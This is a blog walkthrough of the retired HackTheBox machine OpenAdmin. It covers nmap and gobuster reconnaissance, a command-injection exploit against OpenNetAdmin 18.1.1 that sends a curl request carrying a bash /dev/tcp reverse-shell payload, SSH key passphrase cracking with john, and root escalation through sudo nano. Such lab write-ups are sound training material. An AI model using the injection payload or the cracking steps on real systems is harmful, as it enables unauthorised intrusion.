5 min read

OpenAdmin(Linux-based) Machine Walkthrough HTB

OpenAdmin(Linux-based) Machine Walkthrough HTB


Hello Awesome Hackers, nice to meet you all this blog will focus on a retired box on HackTheBox.

Machine - IP:


NSE: Loaded 125 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 21:31
Completed NSE at 21:31, 0.00s elapsed
Initiating NSE at 21:31
Completed NSE at 21:31, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 21:31
Completed Parallel DNS resolution of 1 host. at 21:31, 0.00s elapsed
Initiating Connect Scan at 21:31
Scanning [1000 ports]
Discovered open port 22/tcp on
Discovered open port 80/tcp on
Increasing send delay for from 0 to 5 due to max_successful_tryno increase to 4
Stats: 0:00:35 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 69.70% done; ETC: 21:32 (0:00:15 remaining)
Completed Connect Scan at 21:32, 52.39s elapsed (1000 total ports)
NSE: Script scanning
Initiating NSE at 21:32
Completed NSE at 21:32, 15.85s elapsed
Initiating NSE at 21:32
Completed NSE at 21:32, 0.00s elapsed
Nmap scan report for
Host is up (0.63s latency).
Not shown: 998 closed tcp ports (conn-refused)
22/tcp open  ssh
| ssh-hostkey: 
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open  http
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-title: Apache2 Ubuntu Default Page: It works

NSE: Script Post-scanning.
Initiating NSE at 21:32
Completed NSE at 21:32, 0.00s elapsed
Initiating NSE at 21:32
Completed NSE at 21:32, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 68.46 seconds```

Open Ports

—> port 22 - ssh
—> Port 80 - HTTP

Now I open this IP address on the browser, it is showing Apache2 default page.

Directory Brute Force

gobuster dir -u -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -x php,txt,html -o gobuster-root-php_txt_html

/music (Status: 301)
/artwork (Status: 301)
/sierra (Status: 301)```
Coming to the login page, we got the “open net admin” version let’s recon about the “ona".
Now I see that Version v18.1.1 which it is warning is not the latest.
Now, I trying to find the exploit by using searchsploit
Run the netcat command

nc -nvlp 443

Now I trying to get the shell by using this Curl command

curl -s -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;bash -c 'bash -i >%26 /dev/tcp/ 0>%261'&xajaxargs[]=ping"

I get the shell

Privilege Escalation

Now my task is to go from www-data to jimmy. Now I started the Enumeration and check everything like config files, PHP files, etc.  I get some juicy data.
So here we got some credentials for the database.

Now let’s check how many users are present in the home directory of this machine. Here we got there are two users present in the machine and that is "Jimmy" and "Joanna"

Let’s try to connect through the ssh port for the user jimmy with the above password which we found in the database_settings.inc.php file. I successfully logged in.

Now I found the interesting directory inside the /var/www/ is /internal
The PHP must be hosted using a web server and a particular port MUST be used.
Now I copied the private key back to my box. I used ssh2john  converts the key into a format that john the ripper can understand and crack the passphrase.

sh2john.py id_rsa > hash
john –wordlist=/usr/share/wordlists/rockyou.txt hash

Once the password is cracked. here is the password


now I was given permission to id_rsa

chmod 600 id_rsa

now I trying to log in using ssh port

ssh -i id_rsa jonna@

and enter the passphrase and hit enter. We are successfully logged in. Now we using this command

sudo -l


When inside nano press Ctrl+r followed by Ctl+x. Nano will prompt you which command you want to execute. The command essentially opens a shell on the box as a root.

we get the shell. here are the flags

Thank you for Reading


Twitter: https://twitter.com/nagasaikiran010

Linkedin: https://www.linkedin.com/in/nagasaikiran010/